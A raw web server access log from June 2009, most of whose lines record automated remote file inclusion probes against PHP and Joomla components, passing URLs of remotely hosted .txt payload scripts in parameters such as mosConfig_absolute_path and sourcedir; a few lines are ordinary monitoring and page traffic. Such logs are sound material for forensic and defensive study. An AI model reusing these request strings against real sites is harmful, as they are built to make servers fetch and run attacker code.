211.203.180.144 - - [10/Jun/2009:06:09:56 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:06:10:07 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:06:10:07 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
213.229.183.77 - - [10/Jun/2009:06:10:07 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:06:10:10 -0400] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:06:10:10 -0400] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.226.153.1 - - [10/Jun/2009:06:10:10 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
219.85.63.226 - - [10/Jun/2009:06:11:29 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:11:36 -0400] "GET /logs/access_log.Q109050700/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:11:37 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:11:37 -0400] "GET /logs/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
209.59.12.99 - - [10/Jun/2009:06:11:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.226.153.1 - - [10/Jun/2009:06:12:08 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:13:24 -0400] "GET /logs/error_log.Q109060600/errors.php?error=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
211.203.180.144 - - [10/Jun/2009:06:13:25 -0400] "GET /errors.php?error=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.203.180.144 - - [10/Jun/2009:06:13:25 -0400] "GET /logs/errors.php?error=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
213.229.183.77 - - [10/Jun/2009:06:14:03 -0400] "GET /logs/access_log.Q109052900%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.postech.ac.kr/new/bbs//skin/presidentGallery/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
219.85.63.226 - - [10/Jun/2009:06:14:47 -0400] "GET /logs/error_log.Q109041400/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
208.80.195.38 - - [10/Jun/2009:06:14:50 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; yie6-uk)"
219.85.63.226 - - [10/Jun/2009:06:14:56 -0400] "GET /logs/error_log.Q109041400/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:15:42 -0400] "GET /logs/access_log.Q109051700/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
70.85.165.10 - - [10/Jun/2009:06:16:11 -0400] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:16:11 -0400] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:16:11 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.203.180.144 - - [10/Jun/2009:06:16:15 -0400] "GET /logs/error_log.Q109050800/errors.php?error=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
195.34.78.110 - - [10/Jun/2009:06:16:37 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:37 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:37 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:38 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:38 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:38 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:40 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:40 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:40 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:16:57 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:59 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:16:59 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:01 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:04 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:04 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:04 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:09 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:09 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:09 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
118.219.232.137 - - [10/Jun/2009:06:17:10 -0400] "GET /logs/access_log.Q109052400///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:13 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:13 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:13 -0400] "GET /logs/access_log.Q109052800/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:06:17:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.219.232.137 - - [10/Jun/2009:06:17:22 -0400] "GET /logs/access_log.Q109053100///?_SERVER[DOCUMENT_ROOT]=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:24 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:25 -0400] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:25 -0400] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:25 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:26 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:17:31 -0400] "GET /logs/access_log.Q109052600/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:31 -0400] "GET /?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:31 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:31 -0400] "GET /logs/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:39 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:17:47 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:06:19:05 -0400] "GET /?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:06:19:05 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [10/Jun/2009:06:19:05 -0400] "GET /logs/?sourcedir=http://aboutav.com//id1.txt??? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
219.85.63.226 - - [10/Jun/2009:06:19:35 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
211.203.180.144 - - [10/Jun/2009:06:20:41 -0400] "GET /errors.php?error=http://shanghaisisa.com/skin/ide.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
211.203.180.144 - - [10/Jun/2009:06:21:01 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:21:04 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:21:04 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:21:04 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:21:17 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:21:17 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:21:17 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:21:44 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:21:44 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:21:45 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:21:54 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:21:57 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:21:57 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:21:57 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:22:06 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:22:08 -0400] "GET /logs/access_log.Q109052800%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:22:18 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:22:19 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:06:22:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [10/Jun/2009:06:22:24 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:22:29 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:22:29 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:06:22:34 -0400] "GET /?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.34.78.110 - - [10/Jun/2009:06:22:37 -0400] "GET /logs/access_log.Q109052600%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:06:22:39 -0400] "GET /logs/?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:22:46 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:06:23:20 -0400] "GET /logs/?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
60.251.217.4 - - [10/Jun/2009:06:23:25 -0400] "GET /?view=page&pagename=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
216.119.103.12 - - [10/Jun/2009:06:23:39 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:23:53 -0400] "GET /?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:23:53 -0400] "GET /logs/?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 200 4902 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:23:54 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:24:17 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:24:20 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
116.125.126.72 - - [10/Jun/2009:06:24:40 -0400] "GET /logs/access_log.Q109052800%20%20/?sourcedir=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:24:47 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:25:50 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
70.85.165.10 - - [10/Jun/2009:06:25:58 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
219.85.63.226 - - [10/Jun/2009:06:27:02 -0400] "GET /logs/error_log.Q109050800/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:27:02 -0400] "GET /http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
219.85.63.226 - - [10/Jun/2009:06:27:08 -0400] "GET /logs/http://kamama.thin-media.ca/cyzwy/vop.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
172.16.1.180 - - [10/Jun/2009:06:27:21 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:27:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:27:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [10/Jun/2009:06:27:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [10/Jun/2009:06:29:22 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:06:29:24 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:29:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:29:24 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
70.85.165.10 - - [10/Jun/2009:06:29:35 -0400] "GET /logs/access_log.Q109052800/?sourcedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.49.19.195 - - [10/Jun/2009:06:29:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
62.49.19.195 - - [10/Jun/2009:06:29:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
62.49.19.195 - - [10/Jun/2009:06:29:48 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
62.49.19.195 - - [10/Jun/2009:06:29:48 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
216.119.103.12 - - [10/Jun/2009:06:31:14 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://journaldupoker.com/images/banners/fx29id.txt??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:06:31:21 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:31:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:31:21 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
88.251.135.90 - - [10/Jun/2009:06:32:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.251.135.90 - - [10/Jun/2009:06:32:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.251.135.90 - - [10/Jun/2009:06:32:11 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.251.135.90 - - [10/Jun/2009:06:32:11 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
88.251.135.90 - - [10/Jun/2009:06:32:23 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
209.59.12.99 - - [10/Jun/2009:06:32:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.85.165.10 - - [10/Jun/2009:06:32:32 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
172.16.1.180 - - [10/Jun/2009:06:33:11 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [10/Jun/2009:06:33:11 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
